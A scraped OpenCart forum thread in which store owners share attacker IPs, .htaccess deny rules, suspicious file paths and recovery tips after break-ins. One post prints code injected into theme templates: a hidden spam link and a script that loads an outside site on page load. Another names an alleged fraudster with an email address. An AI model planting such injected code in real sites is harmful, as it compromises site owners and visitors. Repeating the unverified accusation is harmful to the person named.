Some hackers with Vietnam IPs had been going around trying to hack seller's store. Here's some information that might be useful.
Common IPs used by the hackers:
1.55.210.180
1.54.*.*
113.190.139.39
US Proxy Servers
Files to look out for in your system:
system/helper/helper.php
download/ (yourfilenames[dot]random_characters[dot]php_random_characters
modified trojan infected index.html in download folder
download/cp.php
Range of IP recommended to block as they switch between those IPs in Vietnam:
113.22.0.0/16
113.23.0.0/17
113.52.32.0/19
113.61.108.0/22
113.160.0.0/11
1.52.0.0/14
Anyway, the 113.x.x.x range commits a lot of frauds recently.
They also attempts to create an admin user account in the system.
How would one go about blocking these via .htaccess?
This so others can block them if they're not selling in that area.
Thanks for posting btw.
This so others can block them if they're not selling in that area.
Thanks for posting btw.
Norman in 't Veldt
Moderator OpenCart Forums
_________________ READ and Search BEFORE POSTING _________________
Our FREE search: Find your answer FAST!.
[How to] BTW + Verzend + betaal setup.
Not to be offensive, but I rarely have Vietnamese buyers. You just deny them through your .htaccess file. Entering the ip address/subnet will block off the whole range correctly.
Just a heads up to anyone else affected;
If they've used the same tool as they have to hack mine, you might also want to clear your /tmp directory as they have placed key files in mine to allow themselves ssh access.
If they've used the same tool as they have to hack mine, you might also want to clear your /tmp directory as they have placed key files in mine to allow themselves ssh access.
Wedding Invitations and Stationery by Love2print
Commercial Mods
Product Colours on Category Page
Cardsave Direct Gateway
Clear Cache
Promotional Watermarks on Images
Multiple Category / Product Templates ** Popular **
Log Failed Login Attempts
Display Eligible Coupons with Products
Twitter Feeds
Have I helped you out or saved you some time? Please donate
I move that topic to the Moderators forum to have it analyzed.JoseManuel wrote:Watch this topic open.http://forum.opencart.com/viewtopic.php?f=10&t=91623
The IPs and nationality of the attacks seen by me are not real.
Norman in 't Veldt
Moderator OpenCart Forums
_________________ READ and Search BEFORE POSTING _________________
Our FREE search: Find your answer FAST!.
[How to] BTW + Verzend + betaal setup.
so we have to change admin default username/password
and for developers giving admin access to people to show their mods have to disable access to download tab via admin permission feature
is this all or i am missing something.....
and for developers giving admin access to people to show their mods have to disable access to download tab via admin permission feature
is this all or i am missing something.....
A coder by Hobby and Developer by Profession
Images in Manufacture
http://www.opencart.com/index.php?route ... on_id=6943
Description and images in Manufacture
http://www.opencart.com/index.php?route ... on_id=6978
http://codertj.com
if you main store is linked to the demo sites, change your database password! Check your error logs in OpenCart and cPanel. Deny the listed IPs is recommended. Monitor traffic accessing suspicious files that shouldn't be on your server. Monitor for a week to two consistently. A waste of time, but better be safe.
Another IP to note: 178.238.228.92.
The bad things about these hackers, they always forget to clear their footprints after they are done. And the bad things about us, we always don't take enough precaution. Best practice is to comment out the block of PHP codes that does uploading. Removing the javascript isn't enough. Or just change the folder's permission
The bad things about these hackers, they always forget to clear their footprints after they are done. And the bad things about us, we always don't take enough precaution. Best practice is to comment out the block of PHP codes that does uploading. Removing the javascript isn't enough. Or just change the folder's permission
order allow,denyi2Paq wrote:How would one go about blocking these via .htaccess?
This so others can block them if they're not selling in that area.
Thanks for posting btw.
allow from all
deny from 88.131.106.0/24
deny from 180.76.5.0/24 # Baidu Spider
deny from 220.181.108.0/24 # Baidu
deny from 208.83.156.0/24
deny from 113.22.0.0/16
deny from 113.23.0.0/17
deny from 113.52.32.0/19
deny from 113.61.108.0/22
deny from 113.160.0.0/11
deny from 1.52.0.0/14
https://www.lotnllc.com is your one stop shop for all your computer needs!
my website hacked two times in last two weeks, I can not login to admin panel even after the password reset via database phpmyadmin, at before I'm not realized that my website has been hacked until I noticed in user table of database that the IP address is not mine, then when I check the IP location it is from vietnam.
and yesterday I got someone from vietnam trying to steal my product by purchasing it with very low price, the product price is $19.95 but he only pay $0.01 to my paypal, I don't know how he can do it, fortunately the order status is pending so (maybe) he can't download the files.
is there anyone knows which system files that possible to be hacked that causing I can not login to admin?
every one becarefull with this IP :
113.166.96.13
123.21.178.196
93.139.33.141
and becarefull with this name (he register as Andrea Pots but I got his name in paypal payment detail) :
Minh Phuc Duong
paypal address: phucduongqb@zing.vn
and yesterday I got someone from vietnam trying to steal my product by purchasing it with very low price, the product price is $19.95 but he only pay $0.01 to my paypal, I don't know how he can do it, fortunately the order status is pending so (maybe) he can't download the files.
is there anyone knows which system files that possible to be hacked that causing I can not login to admin?
every one becarefull with this IP :
113.166.96.13
123.21.178.196
93.139.33.141
and becarefull with this name (he register as Andrea Pots but I got his name in paypal payment detail) :
Minh Phuc Duong
paypal address: phucduongqb@zing.vn
if you provided demo sites, check all of them. Check your download folders if they made a backdoor program or some sort. Happy searching ~
I noticed the suspicious file about the time this thread was started. Followed a lot of the good steps laid out in the previous posts and haven't had any issues since.
Cheers,
Joel.
Cheers,
Joel.
Canada's Leading Expert In OpenCart Development & Certified OpenCart Development Partner 
I found someone has injected some code in header.tpl, footer.tpl, content_top.tpl files and maybe in other files, and I found it in (maybe) almost all of my demo theme links, I'm still on process checking the files now.
the code injected/inserted in notification div id in header.tpl file, so theme maker please check also your demo links files, maybe it also happen to you, but I hope not.
here is the code that has been injected:
the code injected/inserted in notification div id in header.tpl file, so theme maker please check also your demo links files, maybe it also happen to you, but I hope not.
here is the code that has been injected:
<style>#getcms,.h1en{width:1px; height:1px; position:absolute; overflow:hidden;}</style>
<h1 class="h1en"><a href="http://cartcms.net" title="Cart CMS - Free Shopping Cart CMS" rel="dofollow">Cart CMS - Free Shopping Cart CSM</a>
<div id="getcms"></div></h1>
<script type="text/javascript"><!--
$(document).ready(function() {
$('#getcms').load('http://cartcms.net');
});
//--></script>
Who is online
Users browsing this forum: Anthony101990Jones and 91 guests
